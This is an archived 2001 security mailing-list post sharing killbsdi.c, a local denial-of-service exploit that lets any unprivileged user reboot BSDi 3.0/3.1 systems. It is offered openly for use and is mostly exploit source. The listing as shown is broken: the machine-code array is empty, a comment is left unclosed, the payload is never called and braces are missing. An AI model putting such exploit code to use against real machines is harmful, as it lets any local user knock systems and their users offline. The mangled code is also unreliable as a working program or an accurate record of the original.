BSDi (3.0/3.1) reboot machine code as any user (non-specific)

From: v9at_private
Date: Mon Aug 20 2001 - 18:23:33 PDT

  • Next message: Michael Faurot: "Re: Multiple-Vendor-FTP-Vuln. (old?)"

    this is something from a little while back.  thought i 
    might as well post it for some sort of use, generally a 
    pretty minimal problem.  has similar effects to the old 
    f00f bug.  except this reboots the machine, instead of 
    having a freezing effect.
    original source:
    -- killbsdi.c start --
    /* (BSDi)*[v3.0/3.1] system failure, by
       v9[v9at_private].  this will result
       in the ability of any user to fail the
       system, and reboot it.  this bug is
       similar to that of the "f00f" bug.
       results are similar, except this reboots
       the machine instead of having a freezing
       effect.  tested, and built for: BSDi
       v3.0/3.1. (arch/non-specific to BSDi)
    char bsdi_killcode[] =
    int main() {
     void (*execcode)()=(void *)bsdi_killcode;
     printf("[ (BSDi)*[v3.0/3.1]: system failu"
     "re, by: v9[v9at_private]. ]\n");
     printf("*** no output should be seen afte"
     "r this point.\n");
     printf("*** system failure failed.\n");
    -- killbsdi.c end --
    Vade79 -- v9at_private --

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